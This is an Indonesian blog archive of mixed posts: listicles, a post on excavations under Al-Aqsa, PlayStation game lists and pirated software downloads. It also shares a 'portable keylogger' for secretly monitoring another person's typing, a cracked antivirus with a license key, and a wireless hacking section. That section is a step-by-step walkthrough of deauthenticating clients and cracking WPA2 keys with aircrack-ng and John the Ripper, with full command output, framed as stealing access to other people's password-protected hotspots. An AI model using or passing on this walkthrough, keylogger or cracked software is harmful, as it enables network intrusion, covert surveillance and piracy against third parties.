Daftar

Rabu, 19 Desember 2012

Mengapa Yahudi Menggali Di Bawah Masjid Al-Aqsa?

Apa yang terjadi di Palestina. Ketahuilah apa yang Zionis lakukan dan yang lebih penting Anda tahu mengapa dan kenapa.

Penggalian di bawah Masjid Al-Aqsha sedang dijalankan
Pertama. Lihatlah galian di bawah Masjid Al-Aqsha. Cukup cemas, bahaya dan merusak dasar bangunan Masjidil Al-Aqsha. Jika sebelum ini Anda membaca melalui portal dan media yang berat sebelah. Kini saksikanlah sendiri kerusakan yang parah akibat kerja galian ini. Keretakkan merata-rata di tiang besar, lantai dan dinding masjid yang suci bagi umat Islam.

Kamis, 15 November 2012

10 Lambang Negara Terbaik


1. garuda pancasila (indonesia)

 

7 Pendekar Samurai Terhebat di Dunia


Samurai (侍 atau 士?) adalah istilah untuk perwira militer kelas elit sebelum zaman industrialisasi di Jepang. Kata "samurai" berasal dari kata kerja "samorau" asal bahasa Jepang kuno, berubah menjadi "saburau" yang berarti "melayani", dan akhirnya menjadi "samurai" yang bekerja sebagai pelayan bagi sang majikan.

7 Hewan Herbivora Paling Berbahaya


1. Celeng Liar
  
Celeng liar tidak sepenuhnya vegetarian; mereka makan binatang kecil seperti serangga, kadal dan katak (pada kesempatan tertentu), dan tidak akan menolak bangkai . Namun, seperti segala jenis babi lainnya, mereka juga menkonsumsi tanaman. Berat badan jantan mencapai 300 kg (meskipun langka, dapat digambarkan beratnya lebih dari 1 ton) dan memiliki gading besar yang tajam dan dapat membuka dengan mudah untuk merobek perut pemangsa.

5 Manfaat Apel yang Jarang Diketahui



1. Apel membuat Anda pintar
Mungkin karena meningkatkan produksi asetilkolin, zat kimia yang mentransmisikan pesan antara sel-sel saraf, apel diperkirakan dapat menjaga otak tetap tajam seiring pertambahan usia,meningkatkan memori, dan berpotensi mengurangi kemungkinan mendapatkan penyakit Alzheimer, demikian menurut sebuah penelitian terbaru dari University of Massachusetts at Lowell.

Senin, 12 November 2012

10 Ahli Strategi Militer Paling Hebat Di Dunia


10.Genghis Khan
 
Wilayah seluruh kekaisaran mongol pada puncaknya mempunyai luas 23 juta meter persegi, yang merupakan 22% dari keseluruhan luas daratan di Bumi. Taktik yang memungkinkan penaklukan tersebut dapat ditelusuri terutama dari Genghis kahn, pendiri kerajaan dan kaisar pertama .

nama lahirnya adalah Borjigin Temujin, dan ia menciptakan gaya menyerang serbaguna, yaitu Pasukan pemanah berkuda: pemanah yang terbaik tidak dilatih hanya untuk menembak, tapi untuk menembak akurat saat mengendarai kuda dengan guncangan dan kecepatan penuh. Mereka bahkan bisa menembak akurat langsung di belakang kuda dengan guncangan penuh. Tidak ada kekuatan infanteri di dunia pada waktu itu bisa bertahan oleh serangan pasukan kavaleri tersebut, dan semua bangsa bangsa kewalahan dengan serangan pasukan Mongol yang sangat cepat.

Group Band Paling Populer Dan Legendaris Di Dunia


Group Band Paling Populer Dan Legendaris Di Dunia

1.JACKSON FIVE (Jackie, Tito, Jermaine, Marlon dan Michael Jackson)
Michael Jackson Jackson Five ABC Pictures, Images and Photos
The Jackson 5, Jackson Lima (dieja juga dengan The Jackson Five atau The Jackson 5ive, dan kemudian sebagai The Jacksons) adalah kelompok penyanyi bersaudara yang berasal dari Gary, Indiana. Jacson 5 telah mendapat 2 kali nominasi Grammy Award.

Anggota pendiri kelompok, Jackie, Tito, Jermaine, Marlon dan Michael Jackson membentuk grup ini setelah mengganti nama menjadi The Jackson Brothers, yang pada awalnya terdiri dari 3 orang saudara tertua. Aktif dari 1966 sampai 1989, Jacksons bersaudara bereksperimen dalam musik R&B, soul, pop dan terakhir disko. Selama karir 6 tahun di Motown, Jackson 5 adalah salah satu fenomena pop terbesar di tahun 1970-an[1].

Jackson 5 memulai merilis single ("I Want You Back", "ABC", "The Love You Save", dan "I'll Be There") yang mencapai puncak Billboard Hot 100 di tangga lagu Amerika Serikat. Beberapa single, seperti "Mama's Pearl", "Never Can Say Goodbye" dan "Dancing Machine", menduduki Top 5 hits lagu pop dan nomor satu di tangga lagu single R&B. Sebagian besar ditulis dan diproduksi oleh penulis lagu spesial mereka di Motown, yaitu "The Corporation"; lagu-lagu Jackson 5 yang belakangan sebagian besar dikerjakan oleh Hal Davis. Di akhir 1970-an, Jacksons bersaudara mulai menulis dan memproduksi sendiri lagu-lagu mereka.

10 Taman Paling Indah Di Dunia


10 Taman Paling Indah Di Dunia

1. Viceroy’s Palace Garden, India


2. Het Loo,Belanda

10 Wanita Paling Berpengaruh Di Dunia

1. Ratu Victoria dari United Kingdom,1819-1901

Dalam catatan sejarah Ratu Victoria menduduki urutan pertama wanita paling berpengaruh dalam sejarah. Dia digambarkan sebagai wanita bertangan besi, yang memiliki pengaruh luar biasa, bukan hanya terbatas pada kerajaannya tapi juga dia memimpin kolonialisme Inggris di seluruh dunia sehingga Inggris menjadi Inggris Raya dengan daerah jajahan yang terbanyak di dunia pada abad ke 19.

Sejarah Tersembunyi Para Pemimpin Di Dunia


1. Kubilai Khan

Tentu Anda semua kenal dengan Kubilai Khan. Yup, kaisar Mongol yang sangat kejam dan ekspansif ini ternyata memiliki sisi toleransi yang sangat tinggi. Percaya tidak, Kubilai Khan adalah tokoh pemimpin dunia pertama yang menyatakan bahwa hari-hari besar agama Buddha, Kristen, Yahudi, dan Islam dijadikan sebagai hari libur resmi kenegaraan. Asal tahu saja, Kubilai Khan adalah cucu dari Genghis Khan yang sangat legendaris itu yang memiliki kekuasaan yang merentang dari perbatasan Eropa, Timur Tengah, hingga hampir seluruh Asia Timur pada abad ke-13. Dengan kata lain, hari libur resmi kenegaraan pada tiap hari besar agama di dunia memang memungkinkan untuk dilakukan oleh Kubilai Khan karena luasnya wilayah kekuasaannya.

Sejarah Lagu Apuse


Hapal lirik Garuda Di Dadaku? Bila anda penonton sepak bola piala AFF 2010 paling tidak sudah pernah mendengarnya. Lirik lagu tersebut disusun oleh Ferry Indra Sjarief, ketua The Jakmania yang  sekarang menjabat sebagai asisten manajer Persija. Pentolan grup band Netral yaitu vokalis dan bassisnya, Bagus Dhanar Dhana, menambahkan beberapa lirik pada awal aransemen. Sementara itu lagu yang dibawakan Netral tersebut notasinya mengadaptasi lagu yang berjudul Apuse, sebuah karya daerah asal Biak, Papua.

Selasa, 16 Oktober 2012

List Game PS 1


Air Combat 3 

Crash Bandicoot 1,2,3 

Crash Bash

Digimon Rumble Arena

Dino Crisis

Dino Crisis 2

Harvest Moon - Back To Nature 

Metal Slug X

Nascar Rumble 

One Piece - Grand Battle 

Pepsiman 

Resident Evil

Resident Evil 2

Resident Evil 3 - Nemesis 

Road Rash 3D

Road Rash - JailBreak 

Spyro The Dragon

Suikoden

Suikoden 2 

Team Buddies 

Tomba 2 - The Evil Swine Return

Vigilante 8 2nd 

Winning Eleven 2007 

WWE Smack Down 2

Yu-Gi-Oh - Forbidden Memorie

Emulator PS 1



Mungkin software satu ini sudah banyak yang punya,tapi bagi yang belum mencoba dan ingin bernostagila dengan game-game PS1,maka anda harus mencobanya,dengan emulator ini anda akan memainkan game-game PS1 favorit anda dulu,Emulator yang saya share ini sudah saya sertakan dengan bios,Plugin serta memory card untuk mensave game anda,jadi tinggal jalankan emulator dan buka game PSX nya,ok check it :




Link Download (idws)

Download EpsxE 1.70 + BIOS + PLUGIN (4MB)

Buat yang mau cheatnya,kaya gameshark :
Download PEC(PSX Cheater)

untuk tutorial cara menjalankan file imagenya silakan lihat disini :

Cara Main Game PSX dengan ePSXe 1.7

Biar bisa ngetest langsung saya share juga salah satu game paling populer di PS1 yaitu Harvest Moon :


Link Download (idws):

Download Harvest Moon PSX versi Indonesia (30MB)

Kalau Masih Kurang ,saya tambahin satu game lagi deh ;) :


Link Download (idws): 
Download Tomba 2 (213MB)

Selengkapnya Baca Sumber Di http://sofshare.blogspot.com/2012/02/epsxe-17-biosplugingamemain-ps1-di-pc.html#ixzz29ShU70T9

KEYLOGGER Portable

Keylogger Portable


Keylogger portabel ini berguna memantau penekanan pada tombol keyboard PC yang terpasang keylogger ini,sehingga anda bisa mengetahui apa saja yang dilakukan oleh seseorang di PC yang terpasang keylogger ini,nah keylogger yang saya share ini bersifat portabel sehingga anda bisa memasang dan memakainya kapanpun tanpa harus menginstalnya,sehingga bisa lebih memudahkan anda untuk memantau,ok check this :


Link Download (idws):

Sabtu, 13 Oktober 2012

Wireless Hacking Tool


WIRELESS HACKING TOOL
SAYA DAPAT DARI BINUS HACKER COMMUNITY
NetStumbler
Netstumbler yang dikenal sebagai Jaringan Stumbleris suatu alat acilitates detecting dari Wireless Lans menggunakan Wireless 802.11b, 802.11a dan 802.11g WLAN standar yang berjalan pada sistem operasi dari microsoft Win98 – Win Vista, ada versi lain juga yang disebut Anothere Mini Stumbler yang menggunakan sistem operasi Windows CE. Untuk alat” kecil yang bisa di genggam.
Anda bisa mendapatkannya disini
Aircrack
Tercepat untuk WEP / WPA cracking tool
Aircrack adalah suite alat untuk 802.11a/b/g WEP dan WPA cracking. Hal ini dapat dilakukan dalam 40 sampai 512-bit password WEP dan hanya sekali dienkripsi paket” telah dikumpulkan. Aircrack juga dapat menyerang WPA 1 atau 2 jaringan dengan menggunakan metode lanjutan cryptographic kasar atau memaksa. Suite yang mencakup airodump (802,11 sebuah paket pengambil program), aireplay (802,11 sebuah paket suntikan program), aircrack (statis WEP dan WPA-PSK cracking), dan airdecap (decrypts WEP / WPA untuk pengambil file).
Anda dapat memperoleh Aircrack disini
Airsnort
802,11 WEP Encryption Cracking Tool
AirSnort adalah LAN nirkabel (WLAN) tool yang digunakan untuk merecover enkripsi password. Ia dikembangkan oleh shmoo kelompok pasif dan dioperasikan oleh pemantauan transmisi, komputasi enkripsi password akan dilakukan bila paket telah dikumpulkan. Anda mungkin juga akan tertarik dengan Airsnort ini.
Anda dapat memperoleh AirSnort disini
Cowpatty
Cowpatty ini adalah tools yang baik untuk memaksa cracking WPA-PSK, yang dianggap “WEP Baru” untuk Home Wireless Security. Program ini hanya mencoba a bunch dari berbagai pilihan dari kamus file untuk melihat dan menemukan apa yang didefinisikan sebagai Pre-Shared Key.
Anda dapat memperoleh Cowpatty disini
Asleap
Alat ini sangat bagus ketika menggunakan jaringan Leap. Alat ini dapat digunakan untuk mengumpulkan data otentikasi yang sedang lewat di jaringan, dan ini dapat di sniffed sehingga bisa di crack. Leap tidak melindungi otentikasi lainnya seperti “real” EAP, yang merupakan alasan utama mengapa Leap dapat mudah rusak.
Anda dapat memperoleh Leap disini
Ethereal
Ethereal digunakan oleh seluruh dunia Wind0s oleh kedua sistem operasi dan opensource, yang digunakan untuk mengatasi masalah, analisis, dan perangkat lunak protokol pembangunan, dan pendidikan. Memiliki semua fitur-fitur standar yang akan diharapkan dalam analisa protokol, dan beberapa fitur tidak dilihat pada setiap produk. Lisensi open source memungkinkan penambahan perangkat tambahan bagi anda” yang memiliki keahlian. Bagus loh.. Coba deh :D
Anda dapat men-download Ethereal disini
Yang lainnya:

AiO Wireless Hack Tools 2009:
• NetStumbler 0.4.0
• Kismet 2005 08 R
• Wellenreiter v1.9
• WEP Crack 0.1.0
• Airsnort 0.2.7e
• Wepwedgie 0.1.0 alpha
• Hotspotter 0.4
Information File:
Name: AIO Wireless Hack Tools 2009 Full
Size: 8,1 MB (recovery register 1%)
Language: English
Support Platform: Linux, Windows.
Format: RAR
Downloadfile :
WIRELESS HACKING TUTORIAL
WEP adalah Wired Equivalent Privacy. Ini merupakan standar untuk enkripsi nirkabel sampai sekarang. Banyak orang bahkan tidak menggunakan WEP karena keamanan yang lemah, repot, atau WEP sangat pointless, karena bisa dicrack, walaupun biasanya memakan waktu cukup lama untuk memperoleh cukup data untuk mendapatkan password WEP, terutama password yang sangat panjang.
WEP terdiri dari password rahasia dan enkripsi. Password rahasia yang digunakan bersama antara akses point dan semua orang di jaringan nirkabel, terdiri dari 5 atau 13 karakter. Digunakan oleh proses enkripsi untuk komunikasi paket yang disamarkan sepanjang WLAN, atau Wireless Local Area Network. Semua paket yang unik dan acak, jadi jika seseorang melakukan crack pada satu paket key, mereka tidak dapat melihat apa yang dilakukan orang lain tanpa melakukan cracking pada mereka juga.
Ini semua dilakukan dengan menggunakan password rahasia bersamaan dengan tiga karakter (the Initialization Vector, atau IV) yang dipilih secara acak oleh perangkat nirkabel. Misalnya, jika Anda adalah password “hello”, mungkin membuat “abchello” untuk satu paket, dan “xyzhello” untuk lainnya.
WEP juga menggunakan XOR, atau Eksklusif ATAU, untuk enkripsi. XOR membandingkan dua bit, dan jika theyre berbeda, ia akan mengembalikan 1. Jika tidak, ia akan mengembalikan 0. Misalnya, 1 XOR 1 akan 0, dan 1 XOR 0 akan 1.
Array adalah variabel yang dapat menyimpan beberapa nilai. Misalnya, array abjad [26] akan terus nilai 26, yang diberi label 0 melalui 25.
Contoh:
alphabet[0] = ‘A’;
alphabet[1] = ‘B’;
void swap(char &first, char &second)
{
char temp = first;
first = second;
second = temp;
}
swap(alphabet[0], alphabet[1]);
Jika nilai-nilai array swapped randomely telah berkali-kali, maka tidak mungkin dikirim ke array elemen yang memegang nilai.
Algoritma yang sebenarnya digunakan oleh WEP untuk mengenkripsi paket yang adalah RC4. RC4 terdiri dari dua langkah: dengan password dan Penjadwalan Algoritma Pseudo Random Generasi Algoritma. Bagian pertama, yang Penjadwalan Algoritma password, atau KSA, seperti ini dalam kode C, assuming k [] adalah array dari password rahasia:
int n = 256;
char s[n];
// initialization
for (int i = 0; i <= (n – 1); i++)
s[i] = i;
int j = 0;
// scrambling
for (int l = 0; l <= (n – 1); l++)
{
j += s[l] + k[l];
swap(s[l], s[j]);
}
Mari kita telaah kode di atas hingga kita tahu bahwa:
1. Integer ‘n’ menentukan seberapa kuay enkripsi yang kita buat. WEP disini menggunakan 256.
2. Array karakter ‘k’ adalah password rahasia yang dikombinasikan dengan tiga karakter palsu. Hal ini tidak berubah sama sekali dalam program ini.
3. Tanda ’//Inisialisasi’ hanya merupakan inisialisasi, sebanyak karakter 0-255.
4. Integer ‘j’ digunakan untuk memegang nilai selama scrambling. Selalu diinisialisasi ke 0, karena harus selalu di mulai 0.
5. Selanjutnya, (di mana ‘/ / scrambling’) scrambling proses dimulai. Pada dasarnya akan menghasilkan ‘s’ array “acak” dari sebelumnya ‘ s’ array yang ditentukan.
6. Di dalam lingkaran, yang pertama mereka merges password (k) dengan acak array (s) untuk membuat sebuah karakter selesai. Lalu, panggilan untuk swap () menempatkan ke dalam array dari karakter selesai.
Sekarang saatnya untuk bagian kedua dari algoritma RC4, maka Algoritma Pseudo Random Generation (PRGA). Bagian ini output streaming password berdasarkan KSA’s pseudo-acak array. Streaming key ini akan digabung dengan data cleartext untuk menciptakan data yang dienkripsi.
int i = 0;
int j = 0;
int z;
while (data_disini)
{
i++;
j += s[i];
swap(s[i], s[j]);
z = s[s[i] + s[j]];
// z is outputted here
// and then XOR’d with cleartext
}
1. Integers’ i ‘dan’ j ‘telah dideklarasikan dan diinisialisasi ke 0.
2. Terdapat satu lingkaran yang berjalan sampai akhir paket data tersebut tercapai.
3. ‘I’ adalah incremented dalam setiap perulangan dari lingkaran itu agar tetap berjalan.
4. ‘J’ memegang pseudo-nomor acak.
5. Pemanggil lain untuk swap () karakter yang aktif dalam s [i], dan s [j].
6. ‘Z’ dihitung dengan menambahkan s [i], dan s [j] dan mengambil nilai dalam elemen sesuai jumlah mereka. Alasan ini akan dijelaskan nanti.
7. ‘Z’ adalah XOR’d dengan cleartext untuk membuat teks baru dienkripsi.
Berhubung dgn putaran CRC stands for redundancy checksum. Ketika paket-paket yang dikirim ke seluruh jaringan, harus ada cara untuk mengetahui host menerima paket belum rusak dengan cara apapun. Ini adalah tujuan dari CRC. Sebelum data dikirim, CRC menghitung nilai, atau checksum, untuk paket yang akan dikirim dengan paket. Bila diterima, target host menghitung baru dari checksum menggunakan CRC. CRCs Jika cocok, maka paket dari kredibilitas telah dikonfirmasi.
Ringkasnya. Access Point menciptakan pseudo-acak karakter. Mereka bergabung dengan berbagi prechosen password untuk membuat password rahasia. KSA kemudian menggunakan password ini untuk membuat pseudo-acak array, yang digunakan oleh PRGA streaming untuk membuat key. Password ini kemudian di XOR dengan cleartext untuk menciptakan data dienkripsi, dan masuk ke dalam CRC dan membuat checksumnya.
Kemudian, untuk penerimaan host decrypts. Karakter ditambahkan oleh AP yang akan dihapus dan digabung dengan key untuk dikirim kembali bersama dengan password rahasia. Password masuk melalui seluruh proses RC4, dan XOR’d dengan teks terenkripsi, dan menciptakan cleartext checksum. Checksum akan dihapus dan dibuat yang kemudian dibandingkan untuk melihat apakah data selamat, dan apakah ini merupakan pengguna asli.
Bagian II: Cracking WEP
Sebelum kita masuk cracking WEP, mari kita bahas beberapa flaws dalam proses enkripsi:
* Ada 5% kesempatan bahwa nilai dalam s [0]-s [3] tidak akan berubah setelah tiga Iterasi oleh KSA.
* Yang pertama nilai dalam data dienkripsi adalah SNAP, yang 0xAA, atau 170 basis 10. Sniffing pertama dari byte dan teks terenkripsi XOR-ing dengan 170 akan memberikan output byte pertama dari PRGA.
* J format tertentu yang byte yang diberikan oleh AP akan menunjukkan bahwa ia adalah lemah dan mudah untuk di crack. Format ini (B + 3, 255, X), dimana B adalah byte dari password rahasia. Dimana X dapat bernilai apapun.
Kita akan berbicara tentang KSA sekarang. Mari kita menetapkan beberapa variabel untuk “pengujian”:
* Karakter kode yang diambil dari AP adalah 3255,7. Kami sniffed itu dari udara. Kami akan menggunakannya karena hasil tes telah menunjukkan itu adalah kode yang sangat lemah.
* Shared passwordnya adalah 22222. Dalam prakteknya, Anda tidak akan tahu ini.
* N adalah 256.
* Jika ada nilai di atas 256, modulo operasi akan digelar di atasnya. Nilai yang dihasilkan itulah yang akan digunakan.
* Array ‘s’ telah dipastikan, dengan nilai 0-255.
Buka program Kismet. Kismet adalah scanner nirkabel bebas untuk Linux. Bila Anda membukanya, Anda akan melihat daftar WLAN yang berada dalam jangkauan. Pilih salah satu dan buat catatan dari keempat rincian berikut ini (perlu diketahui bahwa target komputer didapat dari setiap host pada WLAN):
* AP MAC Address
* MAC Address komputer target.
* WEP – Key digunakan
* Wi-Fi- saluran yang digunakan
Buka Aircrack dan anda akan mulai menangkap paket-paket. Anda juga akan menangkap IVs. Tapi ini memakan waktu lama. Ia bahkan dapat berlangsung selama beberapa jam atau hari untuk menangkap jumlah IVs ke crack password WEP.
Untungnya, kami dapat mempercepatnya. Misalnya, jika WLAN sangat sibuk, maka akan lebih banyak lalu lintas paket IVs, sehingga IVs lebih mudah diambil. Jika kami terus ping ke jaringan, akan menghasilkan lebih banyak paket data.
ping-t-l 50000 ip_address
Jadi apa yang harus dilakukan sekarang? Kami memiliki sedikit data, tetapi kita harus mendapatkan password WEP di sini. Ada waktu untuk meloloskan void11. Void11 yang di deauthenticate AP ke semua host yang ada disana. Cutting off dilakukan hingga ke seluruh host. Hal pertama yang dilakukan dalam hal ini adalah automaticall yang akan mencoba untuk menyambung kembali koneksi ke AP.
Namun ada teknik lain yang disebut replay attack. Ini menangkap sebuah paket dari sebuah host pada WLAN, kemudian melakukan spoofs host dan terus mengulang paket berulang ulang. Menghasilkan lalu lintas paket data yang sangat besar. Yang terbaik dari program ini adalah airreplay. Ini adalah untuk apa void11 digunakan.
Buka airodump. Sekarang, ucapkan terima kasih kepada Replay Attack. IV berjalan sekitar 200 per detik. Wow! Anda mungkin akan mendapatkan semua paket yang diperlukan dalam waktu 10 menit. Semua IVs sedang ditulis ke dalam file yang akan diambil. Kemudian buka aircrack. Aircrack akan membaca semua IVs yang di ambil dari file, dan melakukan analisis statistik pada file tsb. Lalu, ia akan berusaha untuk brute force file” yang ada. Setelah menemukan passwordnya, password itu akan diberikan pada anda.
Hehehe.. Finally: Kamu sudah mendapatkan passwordnya :D

Wireless Hacking


Pasti begitu banyak yang mendapatkan Hotspot Gratis, tapi juga ada yang menggunakan Password! Sial klo sedang mau wireless’an eh di password. Nah berikut ini adalah cara untuk melakukan Hacking / Cracking terhadap WPA / PSK yang di password.
Oke, yang diperlukan adalah:
1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda :)
2. Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya, silakan dicari di google.
3. Koneksi wireless / wireless card
4. WPA yang ada di laptop anda.
5. John the ripper password cracker.
6. Aircrack-ng & airodump-ng (Aircrack package dah)
Download BackTrack 5 Disini:
Download BackTrack 5
Download Wordlist John The Ripper Disini:
Download Wordlist
Biasanya tools yang dibutuhkan diatas sudah lengkap ada di BackTrack, klo bukan BT ya silakan Install :)
Wireless Hacking Using BackTrack 5
Oke mari kita lanjutkan:
1. Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya:
root@binushacker:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Zydas zd1211 zd1211rw – [phy1]
(monitor mode enabled on mon0)
2. Khekhehehe.. Ternyata ada yang nongol, yuk mari kita jadikan target wireless tersebut:

root@binushacker:~# airodump-ng mon0
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless
3. Wokeh, sudah tersedia, mari kita mulai mengambil / mencuri akses wireless

root@binushacker:~# airodump-ng mon0 –channel 11 –bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2
CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless
BSSID STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless

Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu.
Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:
4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut:

root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@binushacker:~#

5. Setelah logout & user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut:

CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless
BSSID STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 - 6 0 161
6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya:

root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...
Aircrack-ng 1.1 r1904
[00:00:00] 48 keys tested (489.60 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
Nah, passwordnya ketemu: W!R3L3$$PWD
7. Klo anda gak mau pake wordlist, ya biasanya menunggu agak lama, apalagi klo komputernya lemot bisa berabe. Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper:

root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...
Aircrack-ng 1.1 r1904
[00:00:22] 11484 keys tested (534.50 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
Nah, passwordnya ketemu juga, tapi saya harus menunggu 30 JAM: W!R3L3$$PWD
Untuk lebih detailnya, silakan lihat video berikut:

winRAR

Agan agan yg mau extract sebuah file.rar pke ini alatnya
DOWNLOAD :
Download WinRar 4.20 Final Full Version 

KASPERSKY + FULL SERIAL NUMBER


Sobat semua tidak asing kan dengan salah satu Antivirus dan internet security paling terkenal dikalangan pengguna PC Windows,ya baru-baru ini KasLab mengeluarkan versi terbaru dari produk antivirus dan internet security andalannya ini,yang tentu saja akan banyak fitur-fitur terbaru yang akan menambah rasa aman untuk PC kita baik dalam keadaan offline ataupun online,fitur yang cukup canggih dari kaspersky 2013 ini yaitu adanya fitur SafeMoney dimana bagi sobat yang sedang melakukan transaksi online akan merasa lebih aman,oke cek dulu :





Minimum System Requirements:
  • Windows XP SP3/ Vista SP2/ 7 SP1 (32 and 64 bits)
  • 800 MHz of Processor
  • 512 MB RAM
  • 600 MB of free HDD space
  • Windows Installer 2.0

Link Download :

Download  Kaspersky Internet Security 2013 (157MB)

Download License Key For Kaspersky 2013


Selengkapnya Baca Sumber Di http://sofshare.blogspot.com/2012/08/kaspersky-internet-security-2013-full.html#ixzz29B3hSIHV

List Game PS2

Untuk request khusus game-game ps2,harap komentar di page ini saja,agar bisa ditanggapi 
List Game PS2 :

Ace Combat 5 : The Unsung War

Ace Combat Zero : The Belkan War

Bloody Roar4

Call Of Duty - Finest Hour 

Crash Bandicoot - The Wrath Of Vortex

Crash Nitro Kart 

Crash Of Titans 

Crash Tag Team Racing 

Chaos Legion 

Devil May Cry - All Series 

Digimon Rumble Arena 2

Digimon World 4

Disagea - Cursed Memories 

Disagea - Hour Of Darkness 

Dot Hack GU - All Series 

Dragon Ball - All Series 

Dragon Quest - All Series 

Dynasty warriors All Series

Dynasty Warriors Gundam 2 & Gundam Musou Spesial 

Final fantasy VII Dirge of cerberus

Final fantasy X

Final fantasy X International (ep)

Final fantasy X-2

Final fantasy X-2 International + Last mission (ep)

Final fantasy XII

Final fantasy XII International + Zodiac job system (ep)      

Grandia All Series 

Guitar Hero 3 - Legends Of Rock 

Harvest Moon - Save The Homeland

Inuyasha Feudal Combat 

Inuyasha The secret of the cursed mask 

INNOCENT LIFE: A FUTURISTIC HARVEST MOON

Justice League Heroes 

Kingdom Hearts - All Series 

Megaman - All Series 

Metal Slug 3D 

Monster Hunter

Mystic Heroes

Naruto Shippuden  : Ultimate Ninja 5 

NBA 2K12 

Need For Speed 2 - Underground 

Persona 4 

Pro Evolution Soccer 2011 

Radiata Stories 

Resident Evil - Code Veronica X 

Rogue Galaxy 

Samurai Warriors All Series

Sengoku Basara 2 Heroes 

Shining - All Series 

Sniper Elite 

Sonic - All Series 

Soul Eater - Battle Resonance 

Spyro - All Series

Suikoden III

Suikoden IV

Suikoden V 

Suikoden Tactics

Tales - All Series 

Tenchu : Fatal Shadow

Warriors Orochi 1 & 2 

WWE SmackDown VS Raw 2011 

YS - All Series 

Yugioh! Capsule monster coliseum  

Yugioh! GX Tag force evolution

Yugioh! GX The beginning of destiny

Yugioh! The duelists of the roses 

Thank you